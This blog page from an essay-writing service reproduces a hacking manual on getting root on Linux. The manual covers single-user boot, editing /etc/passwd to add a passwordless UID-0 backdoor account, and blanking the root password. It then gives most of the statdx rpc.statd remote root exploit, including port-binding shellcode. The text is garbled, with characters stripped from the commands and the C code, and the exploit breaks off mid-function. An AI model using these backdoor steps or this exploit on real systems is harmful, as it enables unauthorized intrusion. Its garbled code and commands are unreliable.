Monday, September 16, 2019

Hacking into Linux

If you order your research paper from our custom writing service you will receive a perfectly written assignment on Hacking into Linux. What we need from you is to provide us with your detailed paper instructions for our experienced writers to follow all of your specific writing requirements. Specify your order details, state the exact number of pages required and our custom writing professionals will deliver the best quality Hacking into Linux paper right on time.


Our staff of freelance writers includes over 120 experts proficient in Hacking into Linux, therefore you can rest assured that your assignment will be handled by only top rated specialists. Order your Hacking into Linux paper at affordable prices!


Hacking into Linux


___________________________________________________________


Essay service for your Hacking into Linux paper


Till now almost all Hacking Truths manuals have been Windows centric. I have always kept the newbie Windows user in mind, while writing manuals. However, with the growing popularity of Linux and the fact that Linux is considered to be the Hacker's OS, I decided to start a nix series.


Getting Root on a Linux machine


As you read this manual, you will discover that our basic aim always remains the same, i.e. we want to get root. Now, root is nothing but sort of a sort user, who has maximum privileges, and can do whatever he wants to do on a system. 'Root' is to nix what administrator is to Windows NT. If you get root then you can practically control each and every aspect of the system. You could, remove accounts, delete files, disable daemons, and even format the entire system.


NEWBIE NOTE Getting root is considered to be really really elite especially in schools. If you are able to get root in your school network, then you practically get transformed into a semi-god, but why? Well, the reasons are pretty obvious. Aren't they?


OK, I am really interested. How do I do it? Well, in this section, we are not going to run any C program nor are we going to do any kind of coding, but we will simply exploit a small vulnerability existing in a feature which comes with Linux. This will work almost times out of 10, however, if you plan to use this technique to get 'root' on your ISP, then forget it pal. The technique explained below is quite common and the system administrator would probably be smart enough to cover up this security loophole.


Before we move on, there is one thing that you need to keep in mind. i.e. For this to work, you need to have physical access to the target system. Anyway, boot the target system and wait for the LInux LOader or LILO Prompt to come up.


At the LILO prompt type 'linux single' (without Quotes) or 'linux 1' to get the root shell where you can practically do anything.


Once Linux single is running, you get the root shell where you can type can any command which is accepted by the default shell on your system. Now, here, type 'linuxconf'. This will bring up a blue screen, which is the Linux Configuration Utility. Then, click on Users Root Password. This will allow you to change the root password!!! Yes, you read right, change the root password. Scroll down further, and you could also add new accounts with root privileges.


The linux config utility is certainly not a hole in Linux. It was actually designed to help, if the root password was forgotten.


Well, there is yet another way in which we can get root. In the first method, we typed 'linuxconf' in the bash shell prompt, however, we could type the following to create a new account with root privileges and without any password


echo "ankit00" /etc/passwd


This command will basically edit the /etc/passwd file which is the password file which stores the Passwords and Usernames of all accounts on the machine. One thing to remember here is that you can edit the /etc/passwd file only if you are logged in as root, however, in this case we are not logged in as root, but we have booted into linux single which gives us the root shell. Hence, we can still edit it.


Anyway, to understand how exactly the above command works and how it is able to create a new account without a password, we need to learn the /etc/passwd file is structured.


The following is a line from a password file


ankitmy_passwordAnkit Fadia/home/ankit/bin/bash


The above can in turn be broken up into


Username ankit


Encrypted Password my_password


User number


Group Number


Actual Name Ankit Fadia (Optional)


Home Directory /home/ankit (Optional)


Type of Shell /bin/bash (Optional)


In our command, we have not included the optional fields and the password field of a typical password file line. Our command


echo "ankit00" /etc/passwd


can be rewritten as


Username ankit


Encrypted Password


User number 0


Group Number 0


Actual Name


Home Directory


Type of Shell


This basically creates a new account with root privileges, which can be used as a Backdoor into the system.


HACKING TRUTH If you have enabled, shadow passwords, then the command will change to


echo "ankit00" /etc/shadow


A typical line from the password file on a system with Shadow Passwords enabled is as follows


ankitAnkit Fadia/home/ankit/bin/bash


In a shadowed password file what happens is that the password field is replaced by a(Theis called a token.) such that the encrypted password does not show up in the password file and the list of encrypted passwords is stored in a different file which is not readable by normal users.


I have tired the above method on a number of systems, and have found that it works only about 80% of the times. So, after some more fooling around, I came about with yet another method, which till now seems to be foolproof.


Now, as you are in the root shell, launch your favorite editor (eg vi) and open /etc/passwd in it. Now, delete the encrypted text between the first two colons in the line, which contains the entry for root. This, will not create a new account with root privileges, but will change the password of the root, to null. So, basically this will get you a root account without any password. Once, you have removed the encrypted password, at the prompt, type 'init ' to switch back to the normal start up or else for a graphical start up type ' init 5'.


Now, say you do not want to create a new account, but want to change the root password so as to teach the system administrator a lesson. What do you do? Well, simply use the passwd command followed by the new password. As you are in the root shell, the root password will change to the new one that you supply.


OK, I get the point; Linux too is not 100% safe, so how can I make it safer? Well, you could password protect linux single. To do so, you have to launch your favorite editor like vi, and open /etc/LILO.conf. Now, add the following line, in a new line, after the first line


Restricted password_goes_here


(The above is Restricted followed by a space and following by the password that you choose.)


Now, save and close the editor. At the prompt then type LILO, to execute the /etc/LILO.conf file, so as to make the changes. Now, the next time, you type linux single, at the LILO prompt, you will be asked the password that you typed in the above file. So this basically acts as another barrier for anyone trying to use the techniques described in this manual, to break into your Linux box. None, of the other functioning of the linux box will be affected.


HACKING TRUTH Well, Aragon (veljkop@ptt.yu ) suggested yet another method, which I would like to mention.


1.Go to directory /etc/rc.d


.In it there should be several files if your lucky there are a bunch of files with similar names rc.1,rc....etc. these files are shell scripts which are run each time when the named runnlevel is started. These files are very much similar to autoexec.bat but even more complex you can mess with them to cause interesting results BUT be CAREFULL!). rc.1 is therefore the file for runlevel one


.Backup it in a file named rc.x (or something else)


4.Copy some other runlevel (runlevel is good) but make sure that the runlevel is multi-user.


5.Make a boot and root(for Slackware) disc (do not skip this) so if anything goes wrong you still have a


runlevel 1


Getting root Remotely


The following has been taken from Bugtraq, this exploit is supposed to get you root. However, it has not been tested or verified by me. So give me the feedback.


___________________________________________


From ron1n - shellcode@HOTMAIL.COM


Subject Redhat Linux 6.x remote root exploit


To BUGTRAQ@SECURITYFOCUS.COM


X-UIDL ad856edbbc7d8db5d468ce6eb1f600


Hi,


Included below is an exploit for the recently exposed linux rpc.statd


format string vulnerability[0]. I have tailored it towards current Redhat


Linux 6.x installations. It can easily be incorporated into attacks against


the other vulnerable Linux distributions.


I am not a security expert, but Ill offer my two cents worth this format


string issue, while drawing upon elements of straightforward buffer overflow


exploitation, is more insidious and will probably take some time to instill


itself in the minds of even security-conscious programmers. Programs like


ITS4[1], pscan[], and grep (heh!) do offer valuable assistance when trying


to isolate weak portions of code in a phase one search. However, one thing


Ive


learnt during my short time researching these things is that the complex


interaction between code and data introduces the need for a more extensive


line by line audit[].


This new problem will (if it hasnt already) spark a new wave of code


reviews


of critical applications, especially those networking daemons and privileged


programs which were given the all clear in the first sweep (although


history


shows us that a lot of programs somehow slipped through the cracks.) Someone


else sent an excellent post about the possibility of remote debugging with


these format string vulnerabilities. Once again, Im not speaking out of any


authority, but I can say that such an aid to otherwise blind exploitation


is indeed a godsend when a host is being probed by a skilled intruder.


You must understand that this particular vulnerability is much harder to


exploit than the buffer overflow vulnerabilities that youre probably


accustomed to. The problem which will bite you is that if the calculations


are not precise, statd crashes with a SIGSEGV. As youve realized by now,


brute forcing wont cut it. Also, a successful exploitation will render


subsequent attacks fruitless.


I have seen statd running on a great number of linux systems and if you can


simulate an attack against a remote system on one of your own boxes, it is


trivial to exploit that remote system. Despite the shortcoming with


the single attempt restriction, it was possible to reduce the exploitation


variables down to a SINGLE address for most attacks. The default values


for Redhat Linux 6.x work fine for me, so Im probably fussing over nothing.


Anyway, enjoy the exploit.


ron1n


shellcode@hotmail.com


Sydney, Australia


McDonalds drive-thru guy


[0] http//www.securityfocus.com/


[1] http//www.rstcorp.com/its4/


[] http//www.striker.ottawa.on.ca/~aland/pscan/


[] http//www.openbsd.org/


!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$!@#$


/


statdx


Redhat Linux 6.0/6.1/6. rpc.statd remote root exploit (IA)


by ron1n shellcode@hotmail.com


July 4, 000


Sydney, Australia


Oh you probly wont remember me


Its probly ancient history


Im one of the chosen few


Who went ahead and fell for you


$ gcc -o statdx statdx.c ; ./statdx -h


background info


---------------


rpc.statd is an ONC RPC server that implements the Network Status


Monitor RPC protocol to provide reboot notification. It is used by


the NFS file locking service (rpc.lockd) when it performs lock


recovery.


Due to a format string vulnerability in a call to syslog() within


its logging module, rpc.statd can be exploited remotely by script


kids bent on breaking into your Redhat Linux box and defacing your


website with crackpot political musings.


This is not a traditional buffer overflow vulnerability. The data


are kept within the bounds of the buffer by means of a call to


vsnprintf(). The saved return address can be overwritten indirectly


without a contiguous payload. syslog() is given, for the most part,


a user-supplied format string with no process-supplied arguments.


Our format string will, if carefully constructed, cause the process


to cull non-arbitrary addresses from the top of the stack for


sequential writes using controlled values. Exploitation requires


an executable stack on the target host -- almost invariably the


case. This problem was corrected in the nfs-utils-0.1..1 rpm.


exploit info


------------


You have one shot at this in most situations, so get it right!


If you know the port number rpc.statd is serving requests on, you


can supply the port number on the commandline to bypass the initial


portmapper query. This is very useful for hosts which are filtering


inbound connections to the portmapper. The default attack protocol


is UDP. There is a commandline option to use TCP. Apparently, the


dispatcher uses both protocols by default.


If youre only interested in exploiting a host, then you can safely


skip the following information. Youll only need a buffer address


to get started. This buffer address will either be one of my canned


ones or your own one. It must be precise, and this is where youre


likely to experience difficulties with your attacks.


[va_list][str][4][r][4][r+1][4][r+][4][r+]-----


| |


%espbuffer[104]


[%x..][%!d][%n][%!d][%n][%!d][%n][%!d][%n][sc]---


| r | r+1 | r+ | r+ |


buffer - This is the address youll need (-a and -l options)


str- Process-supplied string; 4 bytes long


4 - Duplicate dwords to satisfy the %!d specifiers and


the double %n when two successive values are equal


r - Stack position of saved eip


%x..- Wipes the va_list dword and str; by default (-w option)


%!d- Used for padding to form an aggregate overwrite value;


the exclamation mark denotes a field width. This may


or may not be present, depending on the value. An


algorithm is used to allow tricky values.


%n - Writes overwrite value to the corresponding address


sc - Nops + portbinding shellcode (port 168)


Only modify the default wipe value and the default offset value if you


know what youre doing.


An easy way to get the buffer address for simulation systems that you


have privileged access to


[term 1]# ltrace -p `pidof rpc.statd` -o foo


[term ]$ ./statdx -r 0x41414141 localhost


[term 1]# grep vsnprintf foo | head -1 | sed s/.(// |


awk -F, {print $1}


(Of course, ensure that rpc.statd is started at boot time and not from


an interactive shell, otherwise it will inherit a larger environment


and blow the accuracy of your findings.)


Ok, longwinded enough. Lets dance.


greets


------


ADM, attrition, rogues, security.is, teso


/


#include stdio.h


#include stdlib.h


#include string.h


#include errno.h


#include unistd.h


#include netdb.h


#include rpc/rpc.h


#include sys/types.h


#include sys/time.h


#include sys/socket.h


#include netinet/in.h


#define SM_PROG 10004


#define SM_VERS 1


#define SM_STAT 1


#define SM_MAXSTRLEN 104


#define max(a,b) ((a)(b)?(a)(b))


#define NOP 0x0


/


Non-ripped linux IA portbinding shellcode.


port 168 ; length 1 bytes


/


char shellcode[] =


x1xc0/ xorl %eax,%eax /


/ jmp ricochet ------------------------------------------------------- /


xebx7c/ jmp0x7c /


/ kungfu ------------------------------------------------------------ /


x5/ popl %ecx /


x8x41x10 / movl %eax,0x10(%ecx) /


/ ------------------------------------ socket(,1,0); ---------------- /


x8x41x08 / movl %eax,0x8(%ecx) /


xfexc0/ incb %al/


x8x41x04 / movl %eax,0x4(%ecx) /


x8xc/ movl %eax,%ebx /


xfexc0/ incb %al/


x8x01/ movl %eax,(%ecx) /


xb0x66/ movb $0x66,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ bind(sd,&sockaddr,16); -------- /


xbx0/ movb $0x,%bl/


x8x5x0c / movl %ebx,0xc(%ecx) /


xc6x41x0ex / movb $0x,0xe(%ecx) /


xc6x41x08x10 / movb $0x10,0x8(%ecx) /


x8x4x04 / movl %ecx,0x4(%ecx) /


x80x41x04x0c / addb $0xc,0x4(%ecx) /


x88x01/ movb %al,(%ecx) /


xb0x66/ movb $0x66,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ listen(sd,blah); -------------- /


xbx04/ movb $0x4,%bl/


xb0x66/ movb $0x66,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ accept(sd,0,16); -------------- /


xbx05/ movb $0x5,%bl/


x0xc0/ xorb %al,%al/


x88x41x04 / movb %al,0x4(%ecx)/


xb0x66/ movb $0x66,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ dup(cd,0); ------------------- /


x8xce/ movl %ecx,%esi /


x88xc/ movb %al,%bl/


x1xc/ xorl %ecx,%ecx /


xb0xf/ movb $0xf,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ dup(cd,1); ------------------- /


xfexc1/ incb %cl/


xb0xf/ movb $0xf,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ dup(cd,); ------------------- /


xfexc1/ incb %cl/


xb0xf/ movb $0xf,%al /


xcdx80/ int$0x80 /


/ ------------------------------------ execve(/bin/sh,argv,0); ----- /


xc7x06xfx6x6x6e/ movl $0x6e66f,(%esi)/


xc7x46x04xfx7x68x41/ movl $0x41687f,0x4(%esi) /


x0xc0/ xorb %al,%al/


x88x46x07 / movb %al,0x7(%esi)/


x8x76x0c / movl %esi,0xc(%esi) /


x8dx56x10 / leal 0x10(%esi),%edx /


x8dx4ex0c / leal 0xc(%esi),%ecx /


x8xf/ movl %esi,%ebx /


xb0x0b/ movb $0xb,%al/


xcdx80/ int$0x80 /


/ ------------------------------------ exit(blah); ------------------- /


xb0x01/ movb $0x1,%al/


xcdx80/ int$0x80 /


/ ricochet call kungfu ---------------------------------------------- /


xe8x7fxffxffxff; / call -0x81 /


enum res


{


stat_succ,


stat_fail


};


struct sm_name


{


char mon_name;


};


struct sm_stat_res


{


enum res res_stat;


int state;


};


struct type


{


int type;


char desc;


char code;


u_long bufpos;


int buflen;


int offset;


int wipe;


};


struct type types[] =


{


{0, Redhat 6. (nfs-utils-0.1.6-), shellcode, 0xbffff14, 104, 600,


},


{1, Redhat 6.1 (knfsd-1.4.7-7), shellcode, 0xbffff14, 104, 600, },


{, Redhat 6.0 (knfsd-1..-4), shellcode, 0xbffff14, 104, 600, },


{0, NULL, NULL, 0, 0, 0, 0}


};


bool_t


xdr_sm_name(XDR xdrs, struct sm_name objp)


{


if (!xdr_string(xdrs, &objp-mon_name, SM_MAXSTRLEN))


return (FALSE);


return (TRUE);


}


bool_t


xdr_res(XDR xdrs, enum res objp)


{


if (!xdr_enum(xdrs, (enum_t )objp))


return (FALSE);


return (TRUE);


}


bool_t


xdr_sm_stat_res(XDR xdrs, struct sm_stat_res objp)


{


if (!xdr_res(xdrs, &objp-res_stat))


return (FALSE);


if (!xdr_int(xdrs, &objp-state))


return (FALSE);


return (TRUE);


}


void


usage(char app)


{


int i;


fprintf(stderr, statdx by ron1n shellcode@hotmail.com);


fprintf(stderr, Usage %s [-t] [-p port] [-a addr] [-l len], app);


fprintf(stderr, [-o offset] [-w num] [-s secs] [-d type]


target);


fprintf(stderr, -tattack a tcp dispatcher [udp]);


fprintf(stderr, -prpc.statd serves requests on port [query]);


fprintf(stderr, -athe stack address of the buffer is addr);


fprintf(stderr, -lthe length of the buffer is len [104]);


fprintf(stderr, -othe offset to return to is offset [600]);


fprintf(stderr, -wthe number of dwords to wipe is num []);


fprintf(stderr, -sset timeout in seconds to secs [5]);


fprintf(stderr, -duse a hardcoded type);


fprintf(stderr, Available types);


for(i = 0; types[i].desc; i++)


fprintf(stderr, %d%s, types[i].type, types[i].desc);


exit(EXIT_FAILURE);


}


void


runshell(int sockd)


{


char buff[104];


int fmax, ret;


fd_set fds;


fmax = max(fileno(stdin), sockd) + 1;


send(sockd, cd /; ls -alF; id;, 1, 0);


for(;;)


{


FD_ZERO(&fds);


FD_SET(fileno(stdin), &fds);


FD_SET(sockd, &fds);


if(select(fmax, &fds, NULL, NULL, NULL) 0)


{


perror(select());


exit(EXIT_FAILURE);


}


if(FD_ISSET(sockd, &fds))


{


bzero(buff, sizeof buff);


if((ret = recv(sockd, buff, sizeof buff, 0)) 0)


{


perror(recv());


exit(EXIT_FAILURE);


}


if(!ret)


{


fprintf(stderr, Connection closed);


exit(EXIT_FAILURE);


}


write(fileno(stdout), buff, ret);


}


if(FD_ISSET(fileno(stdin), &fds))


{


bzero(buff, sizeof buff);


ret = read(fileno(stdin), buff, sizeof buff);


errno = 0;


if(send(sockd, buff, ret, 0) != ret)


{


if(errno) perror(send());


else fprintf(stderr, Transmission loss);


exit(EXIT_FAILURE);


}


}


}


}


void


connection(struct sockaddr_in host)


{


int sockd;


host.sin_port = htons(168);


if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) 0)


{


perror(socket());


exit(EXIT_FAILURE);


}


if(!connect(sockd, (struct sockaddr ) &host, sizeof host))


{


printf(OMG! You now have rpc.statd technique!@#$!);


runshell(sockd);


}


close(sockd);


}


char


wizardry(char sc, u_long bufpos, int buflen, int offset, int wipe)


{


int i, j, cnt, pad;


char pbyte, buff, ptr;


u_long retpos;


u_long dstpos;


while(bufpos % 4) bufpos--;


/ buflen + ebp /


retpos = bufpos + buflen + 4;


/


0x00 ==


Please note that this sample paper on Hacking into Linux is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on Hacking into Linux, we are here to assist you. Your persuasive essay on Hacking into Linux will be written from scratch, so you do not have to worry about its originality.


Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!


Posted by at
Labels: